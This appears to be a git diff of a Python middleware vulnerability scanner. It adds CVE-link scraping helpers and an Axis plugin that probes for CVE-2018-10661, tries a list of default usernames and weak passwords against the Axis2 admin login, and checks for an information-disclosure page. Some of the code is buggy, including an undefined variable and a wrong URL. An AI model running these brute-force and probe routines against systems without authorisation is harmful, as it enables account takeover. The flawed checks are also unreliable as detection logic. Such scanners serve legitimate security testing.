axis

N-MiddlewareScan.py

@@ -51,6 +51,4 @@ def main():
     print("相关漏洞检测完成。")
 if __name__ == '__main__':
     print("开始检测中间件相关漏洞:")
-    main()
-
-
+main()

plugins/CVE的原理分析网址处理脚本/deal.py

@@ -4,5 +4,6 @@ with open("temp.txt",encoding="utf-8") as f:
         i=i.rstrip("\n").split(" 	")[0]
         i=i.replace("-","_")
         #i="def "+i+"(url):\n"+"    "+"headers = {'User-Agent': get_user_agent()}"
-        print(i+"(url)")
+        #print(i+"(url)")
+        print(i)
 f.close()

plugins/CVE的原理分析网址处理脚本/deal2.py

@@ -0,0 +1,31 @@
+#coding=utf-8
+import requests
+import re
+from concurrent.futures import ThreadPoolExecutor
+import traceback
+'''
+s=requests.get(url="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9158")
+s=s.text
+s=re.findall("MISC:http.*",s)[0].rstrip("</a>").lstrip("MISC")
+print(s)
+'''
+def requests_url(cve):
+    try:
+        url = "http://cve.mitre.org/cgi-bin/cvename.cgi?name=" + cve
+        s = requests.get(url=url)
+        s = s.text
+        s = re.findall("MISC:http.*", s)[0].rstrip("</a>").lstrip("MISC:")
+        print(s)
+    except Exception:
+        print(traceback.print_exc())
+
+
+with open("temp2.txt") as f:
+    for i in f.readlines():
+        name = i.rstrip("\n")
+        with ThreadPoolExecutor(40) as excetor:
+            excetor.submit(requests_url(name))
+f.close()
+
+
+

plugins/CVE的原理分析网址处理脚本/temp2.txt

@@ -0,0 +1,15 @@
+CVE_2018_9158
+CVE_2018_9157
+CVE_2018_9156
+CVE_2018_8032
+CVE_2018_19334
+CVE_2018_10664
+CVE_2018_10663
+CVE_2018_10662
+CVE_2018_10661
+CVE_2018_10660
+CVE_2018_10659
+CVE_2018_10658
+CVE_2017_9765
+CVE_2017_15885
+CVE_2017_12413

plugins/axis.py

@@ -1,50 +1,57 @@
 #coding=utf-8
+import requests
 from user_agent import get_user_agent
-def CVE_2018_9158(url):
-    headers = {'User-Agent': get_user_agent()}
-def CVE_2018_9157(url):
-    headers = {'User-Agent': get_user_agent()}
-def CVE_2018_9156(url):
-    headers = {'User-Agent': get_user_agent()}
-def CVE_2018_8032(url):
-    headers = {'User-Agent': get_user_agent()}
-def CVE_2018_19334(url):
-    headers = {'User-Agent': get_user_agent()}
-def CVE_2018_10664(url):
-    headers = {'User-Agent': get_user_agent()}
-def CVE_2018_10663(url):
-    headers = {'User-Agent': get_user_agent()}
-def CVE_2018_10662(url):
-    headers = {'User-Agent': get_user_agent()}
 def CVE_2018_10661(url):
     headers = {'User-Agent': get_user_agent()}
-def CVE_2018_10660(url):
+    data={"action":"abc","return_page":"it_worked"}
+    url=url.rstrip("/")+"/index.html/a.srv"
+    s=requests.post(url=url,data=data,headers=headers)
+    if "it_worked" in s.text:
+        return "exist CVE_2018_10661"
+    else:
+        return "not exist CVE_2018_10661"
+def axis_admin(host):
+    url = "http://%s"%(host)
     headers = {'User-Agent': get_user_agent()}
-def CVE_2018_10659(url):
-    headers = {'User-Agent': get_user_agent()}
-def CVE_2018_10658(url):
-    headers = {'User-Agent': get_user_agent()}
-def CVE_2017_9765(url):
-    headers = {'User-Agent': get_user_agent()}
-def CVE_2017_15885(url):
-    headers = {'User-Agent': get_user_agent()}
-def CVE_2017_12413(url):
-    headers = {'User-Agent': get_user_agent()}
-def axis(url):
-    CVE_2018_9158(url)
-    CVE_2018_9157(url)
-    CVE_2018_9156(url)
-    CVE_2018_8032(url)
-    CVE_2018_19334(url)
-    CVE_2018_10664(url)
-    CVE_2018_10663(url)
-    CVE_2018_10662(url)
-    CVE_2018_10661(url)
-    CVE_2018_10660(url)
-    CVE_2018_10659(url)
-    CVE_2018_10658(url)
-    CVE_2017_9765(url)
-    CVE_2017_15885(url)
-    CVE_2017_12413(url)
-    pass
+    error_i=0
+    flag_list=['Administration Page</title>','System Components','"axis2-admin/upload"','include page="footer.inc">','axis2-admin/logout']
+    user_list=['axis','admin','manager','root']
+    pass_list=['','axis','axis2','123456','12345678','password','123456789','admin123','admin888','admin1','administrator','8888888','123123','admin','manager','root']
+    for user in user_list:
+        for password in pass_list:
+            try:
+                login_url = url+'/axis2/axis2-admin/login'
+                PostStr='userName=%s&password=%s&submit=+Login+'%(user,password)
+                request = requests.post(url=login_url,data=PostStr,headers=headers)
+                res_html = res.text
+            except Exception:
+                return 'axis no weak password。'
+            for flag in flag_list:
+                if flag in res_html:
+                    info = '%s Axis Weak password %s:%s'%(login_url,user,password)
+                    return 'YES|'+info
+    return 'axis no weak password。'
+
+def axis_info(host):
+    url = "http://%s"%(host)
+    vul_url = url + "/axis2/axis2-web/HappyAxis.jsp"
+    try:
+        s=requests.get(url=url)
+        res_html=s.text
+    except Exception:
+        return 'no axis info。'
+    if "Axis2 Happiness Page" in res_html:
+        info = vul_url + " Axis Information Disclosure"
+        return 'YES|'+info
+    return 'no axis info。'
+
+
+def axis(url):
+    cve__2018_10661=CVE_2018_10661(url)
+    print(cve__2018_10661)
+    axis_admins=axis_admin(url)
+    print(axis_admins)
+    axis_infos=axis_info(url)
+    print(axis_infos)
+
 

plugins/plugins.py

@@ -8,5 +8,6 @@ class plugins(object):
         self.options=options
     def run(self):
         axis(self.url)
+        #others